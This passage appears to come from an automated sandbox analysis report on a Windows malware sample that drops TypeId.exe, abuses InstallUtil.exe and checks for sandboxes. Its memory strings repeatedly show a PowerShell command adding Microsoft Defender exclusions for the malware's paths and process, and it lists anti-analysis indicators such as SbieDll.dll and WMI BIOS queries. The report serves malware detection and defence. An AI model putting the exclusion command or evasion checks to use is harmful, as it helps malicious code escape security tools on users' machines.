                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: + ... S\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\TEMP\ASLLOG_DETECTORSTRACE_TYPEID.EXE_7764.TXT
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.000002111782E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXE;
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1837907312.0000000001480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEWINSTA0\DEFAULT
                    Source: file.exe, 00000000.00000002.1783142050.00000000069E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1789825347.000000000778E000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003689000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1835768754.00000000012F7000.00000004.00000010.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.000000000165E000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.0000000001684000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1837654824.0000000001460000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE
                    Source: file.exe, 00000000.00000002.1782217190.0000000006932000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1941849554.0000000006880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE
                    Source: file.exe, 00000000.00000002.1761959990.0000000001275000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <COMMAND>C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE/COMMAND>
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMDEBUGLOG_TYPEID.EXE_7764.TXTHXE
                    Source: TypeId.exe, 00000003.00000002.1941849554.0000000006880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE.CONFIG$
                    Source: TypeId.exe, 00000003.00000002.1841950156.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXELRFQ
                    Source: file.exe, 00000000.00000002.1763526633.0000000003AB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: D-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1838711068.000000000165E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXES
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\SYSTEM32\C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEWINSTA0\DEFAULTALLUSERSPROFILE=C:\PROGRAMDATAAPPDATA=C:\USERS\user\APPDATA\ROAMINGCOMMONPROGRAMFILES=C:\PROGRAM FILES\COMMON FILESCOMMONPROGRAMFILES(X86)=C:\PROGRAM FILES (X86)\COMMON FILESCOMMONPROGRAMW6432=C:\PROGRAM FILES\COMMON FILESCOMPUTERNAME=user-PCCOMSPEC=C:\WINDOWS\SYSTEM32\CMD.EXEDRIVERDATA=C:\WINDOWS\SYSTEM32\DRIVERS\DRIVERDATAHOMEDRIVE=C:HOMEPATH=\USERS\userLOCALAPPDATA=C:\USERS\user\APPDATA\LOCALLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2ONEDRIVE=C:\USERS\user\ONEDRIVEOS=WINDOWS_NTPATH=C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH;C:\WINDOWS\SYSTEM32;C:\WINDOWS;C:\WINDOWS\SYSTEM32\WBEM;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\;C:\WINDOWS\SYSTEM32\OPENSSH\;C:\USERS\user\APPDATA\LOCAL\MICROSOFT\WINDOWSAPPSPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=INTEL64 FAMILY 6 MODEL 143 STEPPING 8, GENUINEINTELPROCESSOR_LEVEL=6PROCESSOR_REVISION=8F08PROGRAMDATA=C:\PROGRAMDATAPROGRAMFILES=C:\PROGRAM FILESPROGRAMFILES(X86)=C:\PROGRAM FILES (X86)PROGRAMW6432=C:\PROGRAM FILESPSMODULEPATH=%PROGRAMFILES(X86)%\WINDOWSPOWERSHELL\MODULES;C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\MODULES;C:\PROGRAM FILES (X86)\AUTOIT3\AUTOITXPUBLIC=C:\USERS\PUBLICSYSTEMDRIVE=C:SYSTEMROOT=C:\WINDOWSTEMP=C:\USERS\user\APPDATA\LOCAL\TEMPTMP=C:\USERS\user\APPDATA\LOCAL\TEMPUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\USERS\userWINDIR=C:\WINDOWS
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILE:///C:/USERS/user/APPDATA/LOCAL/REGISTEREDCHANNELS/HWRTALNMJ/TYPEID.EXEK
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TYPEID.EXEW
                    Source: TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $FQKC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE.CONFIG
                    Source: powershell.exe, 00000006.00000002.1908721371.000002111782E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;EFENDER\MSFT_MPPREFERENCE CIM OBJECT. OPERATION FAILED WITH THE FOLLOWING ERROR: 0X%1!X!6BA. OPERATION: MPPREFERENCE. TARGET: CONFIGLISTEXTENSION.
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B80BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;EFENDER\MSFT_MPPREFERENCE CIM OBJECT. OPERATION FAILED WITH THE FOLLOWING ERROR: 0X%1!X!
                    Source: file.exe, 00000000.00000002.1763526633.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2976520133.000000000309D000.00000004.00000800.00020000.00000000.sdmp, txxbiwtbs.exe, 0000000B.00000002.1995844689.00000000029BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                    Source: TypeId.exe, 00000003.00000002.1941849554.0000000006880000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE.CONFIG
                    Source: TypeId.exe, 00000003.00000002.1838711068.000000000165E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PEID.EXE.CONFIG
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ES\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEH
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;P^
                    Source: TypeId.exe, 00000003.00000002.2028789957.0000000008E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEKB
                    Source: TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $FQDC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ... S\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NPROCESS TYPEID.EXE;
                    Source: file.exe, 00000000.00000002.1763526633.00000000035E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $FQDC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXED
                    Source: TypeId.exe, 00000003.00000002.1948488274.000000000695E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NNELS\HWRTALNMJ\TYPEID.EXE
                    Source: TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $FQDC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE@
                    Source: powershell.exe, 00000006.00000002.2358271034.000002112F437000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TYPEID.EXERYOUTPUT DEVICE ERRORPERFORMANCE DEGRADEDPOWER PROBLEMPRESSURE UNACCEPTABLEPROCESSOR PROBLEM (INTERNAL MACHINE ERROR)PUMP FAILUREQUEUE SIZE EXCEEDEDRECEIVE FAILURERECEIVER FAILUREREMOTE NODE TRANSMISSION ERRORRESOURCE AT OR NEARING CAPACITYRESPONSE TIME EXCESSIVERETRANSMISSION RATE EXCESSIVESOFTWARE ERRORSOFTWARE PROGRAM ABNORMALLY TERMINATEDSOFTWARE PROGRAM ERROR (INCORRECT RESULTS)STORAGE CAPACITY PROBLEMTEMPERATURE UNACCEPTABLETHRESHOLD CROSSEDTIMING PROBLEMTOXIC LEAK DETECTEDTRANSMIT FAILURETRANSMITTER FAILUREUNDERLYING RESOURCE UNAVAILABLEVERSION MISMATCHPREVIOUS ALERT CLEAREDLOGIN ATTEMPTS FAILEDSOFTWARE VIRUS DETECTEDHARDWARE SECURITY BREACHEDDENIAL OF SERVICE DETECTEDSECURITY CREDENTIAL MISMATCHUNAUTHORIZED ACCESSALARM RECEIVEDLOSS OF POINTERPAYLOAD MISMATCHTRANSMISSION ERROREXCESSIVE ERROR RATETRACE PROBLEMELEMENT UNAVAILABLEELEMENT MISSINGLOSS OF MULTI FRAMEBROADCAST CHANNEL FAILUREINVALID MESSAGE RECEIVEDROUTING FAILUREBACKPLANE FAILUREIDENTIFIER DU
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\TEMP\ASLLOG_APPHELPDEBUG_TYPEID.EXE_7764.TXT
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXECOMMONPROGRAMFILP
                    Source: file.exe, 00000000.00000002.1763526633.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B74C1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021116C31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001677000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\USERS\user\APPDATA\LOCALC:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0_32\USAGELOGS\TYPEID.EXE.LOG
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1941849554.0000000006899000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\USERS\user\APPDATA\LOCAL\MICROSOFT\CLR_V4.0_32\USAGELOGS\TYPEID.EXE.LOG
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001677000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TYPEID.EXEIN<
                    Source: TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $FQDC:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE0
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B80BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B7F13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117685000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXE;
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B7F13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117685000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.000002111782E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B7F13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117685000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: NPATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: file.exe, 00000000.00000002.1789340533.0000000007658000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1761959990.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1788582879.000000000726F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1787378066.000000000703C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1763526633.00000000035E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <COMMAND>C:\USERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE</COMMAND>
                    Source: file.exe, 00000000.00000002.1783142050.00000000069E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \S-1-5-21-2246122658-3693405117-2476756634-1002\HWRTALNMJ\TYPEID.EXE
                    Source: file.exe, 00000000.00000002.1763526633.0000000003526000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B76E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2289203789.00000182C74F1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1941849554.0000000006899000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.0000000003689000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1835768754.00000000012F7000.00000004.00000010.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1838711068.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.2030654642.0000000008F7F000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000034A4000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.2022257156.00000000085C0000.00000004.00000020.00020000.00000000.sdmp, TypeId.exe, 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXE
                    Source: TypeId.exe, 00000003.00000002.1841950156.0000000003121000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TYPEID.EXE[T
                    Source: file.exe, 00000000.00000002.1783142050.00000000069E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X\MICROSOFT\WINDOWS\REGISTEREDCHANNELS\TYPEIDLS\HWRTALNMJ\TYPEID.EXE
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B8533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.0000021117C54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K+ ... S\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.2028789957.0000000008E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXEYQ4
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1923913361.00000182B84C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <JOB COMMAND = ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERS\user\APPDATA\LOCAL\REGISTEREDCHANNELS\HWRTALNMJ\TYPEID.EXE.CONFIG
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B80BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.000002111782E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PATH C:\USERS\user\APPDATA\LOCAL,C:\USERS\user\APPDATA\LOCAL\TEMP\; ADD-MPPREFERENCE -EXCLUSIONPROCESS TYPEID.EXE;
                    Source: powershell.exe, 00000001.00000002.1923913361.00000182B84FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1908721371.00000211179B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PROCESS TYPEID.EXE;
                    Source: TypeId.exe, 00000003.00000002.1838711068.0000000001650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\TEMP\ASLLOG_SHIMENGSTATE_TYPEID.EXE_7764.TXT
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 1780000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 3370000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 1780000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 6B60000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 7B60000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 7CB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 8CB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exeMemory allocated: 9EB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeMemory allocated: 1620000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeMemory allocated: 3120000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeMemory allocated: 5120000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeMemory allocated: 6D50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeMemory allocated: 7D50000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 15C0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3050000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 5050000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 6A90000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 7A90000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 8B50000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 9B50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeMemory allocated: E60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeMemory allocated: 2850000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeMemory allocated: 2790000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeMemory allocated: 63C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeMemory allocated: 73C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 3351
                    Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 910
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5856
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3886
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWindow / User API: threadDelayed 1719
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWindow / User API: threadDelayed 2069
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4960
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4684
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8118
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1388
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeWindow / User API: threadDelayed 3588
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeWindow / User API: threadDelayed 601
